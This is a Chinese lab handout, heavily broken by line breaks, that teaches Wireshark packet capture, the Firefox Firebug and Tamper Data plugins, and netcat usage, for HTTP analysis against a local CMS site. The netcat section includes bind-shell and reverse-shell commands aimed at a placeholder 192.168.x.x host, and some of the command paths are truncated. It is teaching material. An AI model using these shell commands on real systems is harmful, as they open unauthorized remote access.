-
实验名称
网络监听与数据包修改工具使用练习
实验目的
通过实验,
使学生掌握协议分析工具的使用方法,
能够利用协议分析工具分析数据包的内容
,
更加深入理解
IP/TCP/HTTP
协议。
另外,
了解
Firefox<
/p>
浏览器调试工具以及
netcat
工具的
基本
使用方法。
实验平台
以
win2003
为主机,
ubuntu
为服务器
实验工具
1.
掌握网络抓包分析工具
Wire
Shark
的使用
2.
掌握
IP/TCP/HTTP
协议分析技能
3.
掌握
Fir
efox
浏览器调试工具的使用
4.
掌握
netcat
工具的使用
实验步骤
【实验原理】
Wireshark
Wireshark
是一个有名的网
络端口探测器,是可以在
Windows
、
Unix
等各种平台运行的网络
监听软件,它主要是针对<
/p>
TCP/IP
协议的不安全性对运行该协议的机器进行监听。其功
能相
当于
Windows
下的
Sniffer
,都是在一个共享的网络环境下对数据包进行捕捉和分析
,而且
还能够自由地为其增加某些插件以实现额外功能。
其最常用的功能是被攻击者用来检测被攻击电脑通过
23
(
telnet
)和
11
0
(
pop3
)端口进行
的一些明文传输数据,以轻松得到用户的登录口令和邮件账号密码。对于网络管理员来说,
也可以通过抓包分析,
来确定一些异常的流量和局域网内部的非正常用户与
外界的通信,
比
如说对于现在比较占用网络带宽的诸如
Bit Torrent
等
P2P
应用软件流量,
通过使用该软件确
定这些流量,网络
管理员就可以使用流量控制(
TC
)的方法来规范、合理的分配
带宽资源,
提高网络的利用率。
Wi
reshark
可以在
/download/
上下载,该软件有极其方便和友好的
图形用户界面,
并
且能够使得用户通过图形界面的配置和选择,
针对多块网卡、
多
个协议进
行显示,效果非常好。目前最新版本为:
Wiresh
ark 0.99
。
Wiresha
rk
安装后自动安装
winpcap
4.0
,
Winpcap
是
UNIX
下的
libp
cap
移植到
windows
下
的产物
,
他是一个
G
PL
项目。
Winpcap
工作于驱动
(Driver)
层,所以能以很高的效率进行网络
操作。
Winpcap
提供了以下强大的功能:
1
.捕获原始的数据包
;
2
.设置
filter,
只捕获自己敢兴趣的数据包
;
3
.方便的把捕获的数据包输出到文件和从文件输入
;
4
.发送原始的数据包
;
5
.统计网络流量。
?
Wireshark
主窗口有很多的
GUI
程序组成
(1)
File(
文件
)
:这个菜单包含:打开文件、合并文件、保存
/
打印
/
导出整个或部分捕获
文件、退出。
(2) Edit(
编辑
)
这个菜单包括:
查找包、
时间参照、
标记一个或多个包、
设置参数、
(
剪切、
复制、粘贴
)
。
(3) V
iew(
查看
)
:
这个菜单控制捕获数据的显示,
包括:
给定特定的一类包标
以不同的颜
色、字体缩放、在一个新窗口中显示一个包、展开
&
折叠详细信息面板的树状结构。
(4)
Go
:这个菜单实现转到一个特定包。
.
(5) apture(
捕获
)
:这个菜单实现开始、停止捕获,编辑捕获过滤条件的功能。
(6)
Analyze(
分析
)
:这个菜单包含编辑显示过滤、
enabl
e(
开
)
或
d
isable(
关
)
协议解码器、
配置用户指定的解码方法、追踪一个
TCP
流。
(7) Statistics
(
统计
)
:该菜单完成统计功能。包括
捕获的包的一个摘要、基于协议的包的
数量等树状统计图等许多功
(8) Help(
帮助
)
这个菜单包含了一些对用户有用的信息。
比如基本帮助、
支持的协议列表、
手册页、在线访问到网站等等。
?
设置<
/p>
Wireshark
的过滤规则
在用
Wireshark
截获数据包之前,应
该为其设置相应的过滤规则,可以只捕获感兴趣的
数据包。
Wi
reshark
使用与
Tcpdump
相似的过滤规则,并且可以很方便地存储已经设置好的
过滤规则。
要为
Wireshark
配置过滤规则,
首先单击
“Capture”
选单,
然后选择
“Capture
Filters...”
菜单项,打开
“Wireshark
:
Capture
Filter”<
/p>
对话框。因为此时还没有添加任何过滤规则,因
而该对话框右侧的
列表框是空的。在
Wireshark
中添加过滤器时,需要为
该过滤器指定名字
及规则。
图
1
:为
Wires
hark
添加一个过滤器
例如,要在
主机
192.168.0.3
和
192
.168.0.11
间创建过滤器,可以在
“Filter n
ame”
编辑框
内输入过滤器名字
“c
jh”
,在
“Filter
stri
ng”
编辑框内输入过滤规则
“host
192.168.0.3
and
1
92.168.0.11”
,然后单击
“
新建
”
按钮即可。
?
应用
Wi
reShark
过滤规则进行抓包
要
将过滤器应用于嗅探过程,需要在截获数据包之前或之后指定过滤器。要为嗅探过
程指定
过滤器,并开始截获数据包,可以单击
“Capture”
选单
,打开
“iterface”
对话框,单击
要抓包的网卡对应的
“
Options:
< br>”
按钮,
然后对该网络接口进行过滤器设置,
其设置内容包括:
?
Interface
(接口)
这个字段指定在哪个接口进行捕获。
这是一个下拉字段,
只能从中选择
Wireshark
识别
出来的接口,默认是第一块支持捕获的非
loopback
接口卡。如果没有接口卡,那么第一个
默认就是第一块
loopback
接口卡。
在某些系统中,
loopback
接口卡不能用来捕获
(
loopback
接口卡在
Windows
平台是不可用的)
。
?
IP
address
(
IP
地址)
所选接口卡的
IP
地址。如果不能解析出
IP
地址,则
显示
?
Link-layer header
type
(链路层头类型)
除非你在
极个别的情况下可能用到这个字段,大多数情况下保持默认值。具体的描述,
见
”
?
Buffer size: n megabyte(s)
(缓冲区大小:
n
兆)
输入捕获时使用的
buffer
的大小。这是核心
buffer
的大
小,捕获的数据首先保存在这
里,直到写入磁盘。如果遇到包丢失的情况,增加这个值可
能解决问题。
?
Capture packets in promiscuous mode
(在混杂模式捕获包)
这个选项允许
设置是否将网卡设置在混杂模式。如果不指定,
Wireshark
< br>仅仅捕获那些
进入你的计算机的或送出你的计算机的包。
(
而不是
LAN
网段上的所有包
).
?
Limit each
packet to n bytes
(限制每一个包为
n
字节)
这个字段设置每一个数据包的
最大捕获的数据量。有时称作
snaplen
。如果
disable
这
个选项默认是
65535,
对于大多数协议来讲中够了。
?
Capture
Filter
(捕获过滤)
这个字段指定一个捕获过滤。
“
在捕获时进行过滤
”
部分进行讨论。默认是
空的,即没
过过滤。
也可以点击标为
C
apture Filter
的按钮
, Wireshark
将弹出
Capture Filters
(
捕获过滤)
对话框,来建立或者选择一个过滤。
在选择了所需要的过滤器后,单击
“
确定
”
按钮,整个嗅探过程就开始了。
Wireshark
可
以实时显示截获的数据包,
因此能够帮助网络管理员及时了解网络的运行状况,
从而使其对
网络性能和流量能有一个比较准确的把握。
Firefox
Firebug
是<
/p>
Firefox
下的一款开发类插件,现属于
Firefox
的五星级强力推荐插件之一。
它集
HTML
查看和编辑、
Javascript<
/p>
控制台、网络状况监视器于一体,是开发
JavaScript<
/p>
、
CSS
、
HT
ML
和
Ajax
的得力助手。
在安装好插件之后,先用
Firefox
浏览器打开需要测试的页面,然后点击右下方的绿色
按钮或使用快捷
键
F12
唤出
Firebug
插件,
它会将当前页面分成上下两个框架,
如图
2
所示。
图
2
:
Fir
ebug
插件展开图示
Tamper-data
可监视
HTTP
请求并记录下每个请求所耗费的时间,
并能够任意修改浏览
器发出的
HTTP
请求的头的内容。
可利用修改请求头的功能来调试程序、寻找安全漏洞,
也利用监视功能
找出应用程序瓶颈。
Tamper-
data
的使用很简单,
点击
Firefox
菜单栏上
“工
具”菜单项里面的“
Tamper
Data
”
,就会弹出
Tamper Data
的主窗口。
图
3
:
Tamper-data
插件展开图示:
Netcat
Netcat
是一个简
单而有用的工具,通过使用
TCP
或
U
DP
协议的网络连接去读写数据。
它被设计成一个稳定的后门工
具,
能够直接由其它程序和脚本轻松驱动。
同时,
它也是一个
功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型
的网络连接。
参数介绍:
'
-h'
即可看到各参数的使用方法。
基本格式:
nc [-options] hostname
port[s] [ports] ...
nc
-l -p port [options] [hostname] [port]
-d
后台模式
-e prog
程序重定向,一旦连接,就执行
[
危险
!!]
-g gateway source-routing
hop point[s], up to 8
-G
num source-routing pointer: 4, 8, 12, ...
-h
帮助信息
-i secs
延时的间隔
-l
监听模式,用于入站连接
-L
连接关闭后
,
< br>仍然继续监听
-n
指定数字的
IP
地址,不能用
hostname
-o file
记录
16
进制的传输
-p port
本地端口号
-r
随机本地及远程端口
-s addr
本地源地址
-t
使用
TELNET
交互方式
-u
UDP
模式
-v
详细输出
--
< br>用两个
-v
可得到更详细的内容
-w secs
timeout
的时间
-z
将输入输出关掉
--
用于扫描时
端口的表
示方法可写为
M-N
的范围格式。
基本用法:
1)
连接到
REMOTE
主机,例子
:
格式:
nc -nvv 192.168.x.x 80
讲解:连到
192.168.x.x
的
TCP80
端口
2)
监听
LOCAL
主机,例子:
格式:
nc -l -p 80
<
/p>
讲解:监听本机的
TCP80
端口
3)
扫描远程主机,例子:
格式:
nc -nvv -w2
-z 192.168.x.x 80-445
讲解:扫描
192.168.x.x
的
TCP80
到
TCP445
的所有端口
4)REMOTE
主
机绑定
SHELL
,例子:
格式:
nc -l -p 5354
-t -e c:
讲解:绑定
RE
MOTE
主机的
CMDSHELL
在<
/p>
REMOTE
主机的
TCP5354
端口
5)RE
MOTE
主机绑定
SHELL
并反向连
接,例子:
格式:
nc -t -e c: 192.168.x.x
5354
讲解:绑定
REMOTE
主机的
CMDSHELL
并反向连接到
192.168.x.x
的
TCP53
54
端口
6)
发送编写好的数据包内容,例子:
格式
1
:
nc
-nvv 192.168.x.x 80 < c:
讲解
:连接到
192.168.x.x
的
8
0
端口,并在其管道中发送
'c:'
的
内容
【实验内容】
1.
在
W
indowsXP
系统上安装
wireshark
工具。访问上一节实验搭建的
siteserver
cms
网站或
者
EmpireCMS
网站,
用
wireshark
抓包,
分析
HTTP Request
和
HTTP Response
数据包
的内容
(从链路层信息至应用层信息)
2.
使用
IE
浏览器,在“工具
->Internet
选项
->
< br>高级”中选择“使用
HTTP1.1
”
< br>,
访问
siteserver cms
网
站或者
EmpireCMS
网站抓包,
查看
HTTP/1.1
的
reques
t
数据包的内容;
在“工具
->Internet
选项
< br>->
高级”中
不
选择“使用
HTTP1.1
”
,
访问
siteserver c
ms
网站或者
EmpireCMS
网站
抓包,
查看
HTTP/1.0
的
request
数据包的内容;
对比二者的区
别
2.
安装
firefox
浏览器,安装
firebug
与
tamper
data
插件,
打开火狐浏览器,点击菜单栏里面的
工具——》附加组件——》
“设置标志”——》从文件
安装附加
组件——》选中组建并点击打开——》重启浏览器便成功